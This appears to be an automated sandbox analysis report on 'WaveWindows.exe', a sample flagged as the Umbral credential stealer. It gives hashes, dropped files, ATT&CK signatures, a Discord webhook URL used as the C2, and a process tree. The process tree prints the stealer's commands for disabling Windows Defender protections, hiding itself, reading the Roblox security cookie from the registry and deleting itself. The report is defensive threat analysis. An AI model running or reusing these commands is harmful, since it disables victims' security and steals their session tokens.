Overview

overview

10

Static

static

10

Wave/LICEN...m.html

windows7-x64

3

Wave/LICEN...m.html

windows10-2004-x64

3

Wave/WaveWindows.exe

windows7-x64

10

Wave/WaveWindows.exe

windows10-2004-x64

10

Wave/d3dco...47.dll

windows10-2004-x64

1

Wave/ffmpeg.dll

windows10-2004-x64

1

Wave/libEGL.dll

windows10-2004-x64

1

Wave/libGLESv2.dll

windows10-2004-x64

1

Wave/resou...DME.js

windows7-x64

3

Wave/resou...DME.js

windows10-2004-x64

3

Wave/resou...dex.js

windows7-x64

3

Wave/resou...dex.js

windows10-2004-x64

3

Wave/resou...DME.js

windows7-x64

3

Wave/resou...DME.js

windows10-2004-x64

3

Wave/resou...ten.js

windows7-x64

3

Wave/resou...ten.js

windows10-2004-x64

3

Wave/resou...DME.js

windows7-x64

3

Wave/resou...DME.js

windows10-2004-x64

3

Wave/resou...dex.js

windows7-x64

3

Wave/resou...dex.js

windows10-2004-x64

3

Wave/resou...ead.js

windows7-x64

3

Wave/resou...ead.js

windows10-2004-x64

3

Wave/resou...son.js

windows7-x64

3

Wave/resou...son.js

windows10-2004-x64

3

Wave/resou...raw.js

windows7-x64

3

Wave/resou...raw.js

windows10-2004-x64

3

Wave/resou...ext.js

windows7-x64

3

Wave/resou...ext.js

windows10-2004-x64

3

Wave/resou...ded.js

windows7-x64

3

Wave/resou...ded.js

windows10-2004-x64

3

Wave/resou...DME.js

windows7-x64

3

Wave/resou...DME.js

windows10-2004-x64

3

Analysis

  • max time kernel
    32s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    13-09-2024 19:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Wave/WaveWindows.exe

  • Size

    27.9MB

  • MD5

    2d0703acbed8003c7afa9f08f702f251

  • SHA1

    35181a175abe31f337f1d2ec83da735d70f327fe

  • SHA256

    147c4eb6a5c1235c21a1bed6f352eb257c15747309b618e993442f04a4e613f4

  • SHA512

    aefcfbeba017b7a56edce41a8ddcd4fd6b410819ae760cdf7990a3f2e9d16654ad5587e49678cdc97e9a8f9487a568721479b1fc52b12d9a7f639d1c6a4a4c02

  • SSDEEP

    786432:07vDACrv3Fqbq0ohQivGgPQEErUlqsAN50hO:07v0eqbVwQEG89EdN50hO

Score
10/10
umbralcredential_accessdiscoveryexecutionpyinstallerspywarestealerupx

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1284109352877428746/ynYxJ7LoUnQYDiMVawzxesm3MoVdr_2vbNfl-vna_xyFrDmgWu6L7UCN0tMvtbReFJJ8

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 21 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 2 IoCs
    pyinstaller
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Wave\WaveWindows.exe
    "C:\Users\Admin\AppData\Local\Temp\Wave\WaveWindows.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2300
    • C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:780
      • C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE
        "C:\Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2684
    • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2092
      • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE
        "C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:572
    • C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE
      "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1916
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE"
        3⤵
        • Views/modifies file attributes
        PID:2096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2988
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2260
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2724
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2604
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2620
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2636
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:2840
          • C:\Windows\system32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:2084
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2900

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\BOOSTRAPPER.EXE
        Filesize

        17.2MB

        MD5

        43d964429554f10cd2998d9e2f3b6d2c

        SHA1

        d5310c347472b521934d05b78a3475eb9d98af88

        SHA256

        61d2874397de398da38e6dbae1317b8d555e4251dd274c28abaa24b146db920d

        SHA512

        e624f31322c4e0ac8d29913f5cad2dad6543afce03403b527169e4e03da6950b572ecaa757cb037fb97dc9abde3bcc56d46863a6bdca24b108e5193cc1f48ed4

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\BOOTSTRAPPPER.EXE
        Filesize

        229KB

        MD5

        86e5ff4fe7928b5c8937d44e39898936

        SHA1

        9af8d86ebbcc235c5d39dc77f3adc7199bb46ee8

        SHA256

        f73aa033b6381ec36324947f613a7990af13f0c32cc217403fbf3d741b35b311

        SHA512

        c01f2061db11101fca739406f4a679c163d6c55fa76222e409388735db7d07bc550feccd2122d3d7f4cf19766969e3e4363bdd56330161a30ce7823c68d490e4

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI20922\python310.dll
        Filesize

        4.2MB

        MD5

        384349987b60775d6fc3a6d202c3e1bd

        SHA1

        701cb80c55f859ad4a31c53aa744a00d61e467e5

        SHA256

        f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

        SHA512

        6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-file-l1-2-0.dll
        Filesize

        21KB

        MD5

        1c58526d681efe507deb8f1935c75487

        SHA1

        0e6d328faf3563f2aae029bc5f2272fb7a742672

        SHA256

        ef13dce8f71173315dfc64ab839b033ab19a968ee15230e9d4d2c9d558efeee2

        SHA512

        8edb9a0022f417648e2ece9e22c96e2727976332025c3e7d8f15bcf6d7d97e680d1bf008eb28e2e0bd57787dcbb71d38b2deb995b8edc35fa6852ab1d593f3d1

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-file-l2-1-0.dll
        Filesize

        18KB

        MD5

        bfffa7117fd9b1622c66d949bac3f1d7

        SHA1

        402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

        SHA256

        1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

        SHA512

        b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-localization-l1-2-0.dll
        Filesize

        21KB

        MD5

        724223109e49cb01d61d63a8be926b8f

        SHA1

        072a4d01e01dbbab7281d9bd3add76f9a3c8b23b

        SHA256

        4e975f618df01a492ae433dff0dd713774d47568e44c377ceef9e5b34aad1210

        SHA512

        19b0065b894dc66c30a602c9464f118e7f84d83010e74457d48e93aaca4422812b093b15247b24d5c398b42ef0319108700543d13f156067b169ccfb4d7b6b7c

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-processthreads-l1-1-1.dll
        Filesize

        21KB

        MD5

        517eb9e2cb671ae49f99173d7f7ce43f

        SHA1

        4ccf38fed56166ddbf0b7efb4f5314c1f7d3b7ab

        SHA256

        57cc66bf0909c430364d35d92b64eb8b6a15dc201765403725fe323f39e8ac54

        SHA512

        492be2445b10f6bfe6c561c1fc6f5d1af6d1365b7449bc57a8f073b44ae49c88e66841f5c258b041547fcd33cbdcb4eb9dd3e24f0924db32720e51651e9286be

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\api-ms-win-core-timezone-l1-1-0.dll
        Filesize

        21KB

        MD5

        d12403ee11359259ba2b0706e5e5111c

        SHA1

        03cc7827a30fd1dee38665c0cc993b4b533ac138

        SHA256

        f60e1751a6ac41f08e46480bf8e6521b41e2e427803996b32bdc5e78e9560781

        SHA512

        9004f4e59835af57f02e8d9625814db56f0e4a98467041da6f1367ef32366ad96e0338d48fff7cc65839a24148e2d9989883bcddc329d9f4d27cae3f843117d0

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\python310.dll
        Filesize

        1.4MB

        MD5

        90d5b8ba675bbb23f01048712813c746

        SHA1

        f2906160f9fc2fa719fea7d37e145156742ea8a7

        SHA256

        3a7d497d779ff13082835834a1512b0c11185dd499ab86be830858e7f8aaeb3e

        SHA512

        872c2bf56c3fe180d9b4fb835a92e1dc188822e9d9183aab34b305408bb82fba1ead04711e8ad2bef1534e86cd49f2445d728851206d7899c1a7a83e5a62058e

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\_MEI7802\ucrtbase.dll
        Filesize

        992KB

        MD5

        0e0bac3d1dcc1833eae4e3e4cf83c4ef

        SHA1

        4189f4459c54e69c6d3155a82524bda7549a75a6

        SHA256

        8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

        SHA512

        a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        6b4189fd7bae508015035ab6d42291ad

        SHA1

        5433ec09574d5908f38727bc2e0a759acdeb4438

        SHA256

        86bfa7ca416890d61e267c47ab4276b5adda136d281657c42cf2802090328ff2

        SHA512

        f82204b3c4dbc22ddd4df095c74681cb5515409defc2ec87dbf1c91e8ee61106f6a3821bc7af2924b15acea1ca0566108099a312ad899693662b8ffccc5e849b

        Download Submit

      • \Users\Admin\AppData\Local\Temp\BOOESTRAPPER.EXE
        Filesize

        10.2MB

        MD5

        e04bf3d008e9ace5c8abe6b9abcf4620

        SHA1

        2b0e7f4650cf2c92dab7dc6dac458f4dd7f86bfc

        SHA256

        8d211399d7b30b3a7326d550d2883cc229f9ca7dfd77af64a5dc4dc44129e103

        SHA512

        b0cc844172ca6eec8464908066f085b122f467e93f1cd0e850a8e69e7a356e89b7255f50e873073e815b48c9124a30463247a6a20e2bd34d69963f3cf42731ec

        Download Submit

      • memory/908-272-0x000000001B750000-0x000000001BA32000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/908-273-0x0000000002410000-0x0000000002418000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1804-252-0x0000000000880000-0x00000000008C0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2636-308-0x000000001B700000-0x000000001B9E2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2636-309-0x0000000001E80000-0x0000000001E88000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2684-106-0x000007FEF6930000-0x000007FEF6D95000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/2684-313-0x000007FEF6930000-0x000007FEF6D95000-memory.dmp

        Filesize

        4.4MB

        Download

      • memory/2988-279-0x000000001B550000-0x000000001B832000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2988-280-0x0000000001D70000-0x0000000001D78000-memory.dmp

        Filesize

        32KB

        Download